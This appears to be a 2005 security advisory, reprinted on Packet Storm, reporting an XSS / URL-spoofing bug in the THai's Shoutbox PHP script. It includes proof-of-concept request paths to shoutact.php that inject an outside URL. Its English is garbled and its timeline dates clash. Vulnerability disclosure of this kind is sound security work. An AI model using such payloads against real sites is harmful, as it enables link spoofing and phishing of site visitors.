THai's Shoutbox is susceptible to a cross site scripting bug.
ed49a7e339d0891d132dc79e327caf12fabaf981cbcaf07676c4f8b3aa3c5658-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ THai's Shoutbox ]=-
-=[
]=-
-=[ Author: CorryL www.x0n3-h4ck.org ]=-
-=[
]=-
-=[----------------------------------------------------]=-
-=[+] Application: THai's Shoutbox
-=[+] Version: not available
-=[+] Vendor's URL: not available
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: XSS spoofing url
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck
..::[ Descriprion ]::..
THai's Shoutbox and' a small glass showcase where the consumers of his/her
own site can leave messages,
and' very easy to use and to install, it doesn't need database mysql
..::[ Bug ]::..
this application and' he/she cuts from a bug type XSS a remote attaccker it
is able' to exploit this bug for spoofing a malignant url
..::[ Proof Of Concept ]::..
/shoutact.php?yousay=default&query=https://www.x0n3-h4ck.org
/shoutact.php?yousay=default&name=default&query=https://www.x0n3-h4ck.org
/shoutact.php?yousay=default&email=default&query=https://www.x0n3-h4ck.org
/shoutact.php?yousay=default&email=default&name=default&query=https://www.x0n
3-h4ck.org
..::[ Workaround ]::..
Vendor not avaliable
..::[ Disclousure Timeline ]::..
[27/03/2005] - No patch relase from vendor (not avaliable)
[27/02/2005] - Public disclousure
CorryL
corryl80@gmail.com
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck
_________________________________
www.seekstat.it is your web stat
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed